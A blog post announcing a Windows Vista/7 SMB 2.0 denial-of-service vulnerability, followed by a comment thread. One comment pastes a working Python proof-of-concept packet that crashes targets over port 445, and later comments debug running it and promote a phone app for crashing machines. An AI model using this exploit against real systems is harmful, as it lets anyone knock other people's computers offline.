Windows 7 and Vista crash via SMB exploit

vista_dx10_bsod

[Laurent Gaffié] has discovered an exploit that affects Windows Vista, Windows 7, and possibly Windows Server 2008 (unconfirmed). This method attacks via the NEGOTIATE PROTOCOL REQUEST which is the first SMB query sent. The vulnerability is present only on Windows versions that include Server Message Block 2.0 and have the protocol enabled. A successful attack requires no local access to the machine and results in a Blue Screen of Death.

[Laurent] has a proof of concept available with his writeup in the form of a python script (please, white hat use only). There is no patch for this vulnerability but disabling the SMB protocol will protect your system until one is available.

Update: According to the Microsoft advisory this vulnerability could lead to code execution, making it a bit worse than we thought. On the bright side, they claim that the final version of Windows 7 is not open to this attack, only Windows Vista and Windows Server 2008.

[via Full Disclosure]

[picture: Inquirer]

Comments

  1. The_Evil_Machinist says:

    99 bugs in the os that I use
    99 bugs in the os
    Patch one bug
    Install the new bug fix,
    101 bugs left in the system that I use!

  2. MrX says:

    This one is pretty ugly. I wouldn’t like having my computer getting a intentional BSOD in a library, university network or on a LAN party.

    I use other OS so no problem, but if I had windows I would block port 443. This will stop your windows from file-sharing but it is still better than letting others blue-playing with it.

  3. m0zzie says:

    Yup, saw this today. There’s a windows command line PoC available too. Tested and confirmed earlier.

    The win command line tool is at http://www.dereenigne.com

  4. proofreading nazi says:

    It “effects” Windows? Well…that word does fit there grammatically, but you probably meant “affects”.

  5. Addictronics says:

    I remember when I used to come here for NEW tech news/hacks (really hacks) but now even reddit is ahead…. /rant

    cool..

  6. rsvpepper says:

    That is why I use Ubuntu! Forget Windows go Linux!

  7. Mio says:

    The RTM version of 7 is not affected. Only prerelease versions are vulnerable to this.

  8. jbot says:

    rsvpepper, I too am a full-time Linux user, but I need to say, don’t become smug about it. Ubuntu still breaks terribly on too much hardware to be a full-time solution for everyone. It is not THE ANSWER. I mean, my wireless is unstable, my sound is sort of broken, my touchpad’s driver doesn’t allow me to turn off tap-to-click, and connecting to FTP via the option in Nautilus stalled and left a file copy open indefinitely. I am on an Eee that is a couple years old, running 9.04. It is stable enough for what I do with it (take notes) but it isn’t great. It works beautifully on my older Dell Latitude though.

    It is ready for a lot of people on the desktop, but you need to do your research before posing it as the answer to life, the universe, and everything. It will get there, but it is going to take some time.
    [/offtopic]

    I agree with full disclosure. I honestly don’t see how anyone can sympathize with such an excruciatingly slow-to-react company.

  9. speps says:

    “with her writeup”

    BTW, Laurent is male name

  10. RizzyRong says:

    Oh what a scary day,…….

    Everyone love them some Windows Domains right about now.

    How many Admins admittedly have a little bit of sweet running down there brow??

  11. Mike Szczys says:

    @speps: thanks, updated.

  12. Catur says:

    wow thanks for the information. I should tell about all the user of windows 7 & vista in my school. I don’t want them make me busy all day because any script kiddies run this vulnerabilities script.

    “to all win 7 & vista user please stop your file sharing and put some firewall”

  13. Austin says:

    This does not affect Windows 7 RTM, only the RC and beta

  14. MrX says:

    @Mio
    @Austin
    Yeah, it doesn’t, I just experienced that when trying to bring a friend’s computer offline :)

    @Addictronics
    Just because you don’t like the post it doesn’t mean others don’t like it too. Instead of going furious, you should be happy because hackaday is publishing public security disclosures.
    Maybe you would like to know about this vulnerability by “the hard way” (i.e. going BSOD) instead? Because I don’t think so.

    @rsvpepper
    I also use GNU/Linux but I don’t think this is the correct way of calling people either.

    @jbot
    IMHO, OS wizardry and automatism is more prune to bugs and breakage (assuming people know what they do at manual configurations).
    So have you tried other GNU/Linux with other tradeoff between automatism-buggyness? Maybe you like it.

    @Me
    STFU already and stop procrastinating work.

  15. SexieWASD says:

    1 bug in the os that I use
    1 bug in the os
    Patch one bug
    Install the new bug fix,
    Break xorg.conf…

    crap.

  16. Malef says:

    Just another cool way to reboot your desktop…..or someone else’s.

  17. sly says:

    @SexieWASD
    runlevel 3 is your friend… *evil mad scientist grin*
    http://www.ubergeek.tv/article.php?pid=54

  18. monkeyslayer56 says:

    whahahahahahaha *evil grin* hmmmm soudns like fun expesually since im a full time linux user lol

  19. NoiseFilter says:

    @SexieWASD

    Nobody tunes Xorg.conf anymore.
    * Screen resolution is auto-detected by XrandR, or proprietary drivers, the same for multi-screen setups.
    * Most distros use the XInput/hal for auto-detecting and configuring input devices.

    You can even delete Xorg.conf, your screen will be set up correctly and the keyboard/mouse recognized.

    Golden rule of the ignorance:
    The less you know about it, the funnier the joke will be.

  20. OrderZero says:

    Actually for my computer I have to tune xorg.conf everytime I reformat because it detects my video card settings completely wrong I mean it’s no big deal for me but for alot of people who don’t know it’d be a real turnoff.

    Posting from my debian machine ssh tunneled through a freebsd machine <3

  21. Dave says:

    You know what? I think I might just abandon M$ forever… Those evil M$ bastards are just after my money. They have it so much better over at the app store. Knowledge and innovation after all, were meant to be controlled by corporations. Don’t you know that the blue screen of death and the frowning mac icon are mere fantasy. Yes, pound your machine for your own misunderstanding of how it actually works. You MUST understand that corporations need control your machine for you. You and I are far too unintelligent to understand what our machine is doing for us.

  22. Agent420 says:

    @ Dave

    [img]http://img353.imageshack.us/img353/9117/daveyv6.jpg[/img]

  23. Dave says:

    Dude,

    I just shouted on Hack a Day! Feels great!

  24. Tiao says:

    With Arguments

    ———–

    #!/usr/bin/python
    #When SMB2.0 recieve a “&” char in the “Process Id High” SMB header field
    #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

    from socket import socket
    from time import sleep
    import sys

    print “\n~> SMBv2.0 Overflow de Negociacao”

    if len(sys.argv)!=2:
    print “~> Erro – Uso: %s ” % sys.argv[0]
    sys.exit(0)

    host = sys.argv[1], 445
    buff = (
    “\x00\x00\x00\x90″ # Begin SMB header: Session message
    “\xff\x53\x4d\x42″ # Server Component: SMB
    “\x72\x00\x00\x00″ # Negociate Protocol
    “\x00\x18\x53\xc8″ # Operation 0x18 & sub 0xc853
    “\x00\x26″# Process ID High: –> :) normal value should be “\x00\x00″
    “\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe”
    “\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54″
    “\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31″
    “\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00″
    “\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57″
    “\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61″
    “\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c”
    “\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c”
    “\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e”
    “\x30\x30\x32\x00″
    )
    s = socket()
    s.connect(host)
    s.send(buff)
    s.close()

  25. whitewiz says:

    All setup to test Windows Server 2008 R2 when i run the python script i get the following error:

    C:\temp>Smb-Bsod.py 192.168.1.11
    Traceback (most recent call last):
    File “C:\temp\Smb-Bsod.py”, line 25, in
    s = socket()
    NameError: name ‘socket’ is not defined

    C:\temp>

    does it require 2 arguments?

  26. whitewiz says:

    C:\temp>Smb-Bsod2.py 192.168.1.11
    Traceback (most recent call last):
    File “C:\temp\Smb-Bsod2.py”, line 36, in
    s.send(buff)
    TypeError: must be bytes or buffer, not str

    C:\temp>

    grr what a formating nightmare

  27. m0zzie says:

    whitewiz, initialise the buffer with create_string_buffer()

    alternatively, just use the win32 example at http://www.dereenigne.com

  28. I don’t get it. I used the Python program (which someone also posted above), and after fixing a couple of errors (add “import socket” and change “socket()” to “socket.socket()“), it didn’t work. Wireshark confirmed that the machine was getting the packet of death (and was even attempting to respond to it), but no bluescreen occurred.

    No updates installed; no firewall. I suspect the exploit program has been intentionally crippled so script kiddies like me can’t willy-nilly crash machines. :)

  29. m0zzie says:

    Have just finished my Android implementation of this PoC.

    Available in the Android market by searching for BSODroid, or you can grab it from http://www.dereenigne.com/

    Fun little tool to have on your mobile phone! :)

  30. cyberpunk64bit says:

    99 fixes for windows to patch down, 99 fixes to patch, you take one down, patch it around, 100 fixes to patch down. 100 fixes to patch down, 100 fixes to patch, you take one down, patch it around, 101 fixes to patch down.. :D

  31. Jackson says:

    http://www.dereenigne.com/ for me only pops up a command prompt that quickly closes.

  32. CB says:

    I just ran this against Windows 7… Microsoft lied about it not being affected.

  33. CB says:
  34. CB says:
  35. leeroy says:

    The error “TypeError: must be bytes or buffer, not str” appear if you have Python 3.x installed.
    Just uninstall Python 3.x and install Python 2.6.x

  36. Bowser says:

    THOSE PESKY PLUMBERS AGAIN

  37. hackthisway says:

    @Mrx not 443, it is 445

  38. rajiv shah says:

    It was really awesome trick but if you want some more then check link given below….

    http://minefreestuff.blogspot.com/2009/12/raise-your-windows-vista-rating-tweak.html

  39. Windows Vista is good but it can hog your CPU and Memory.,’-

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Follow

Get every new post delivered to your Inbox.

Join 92,285 other followers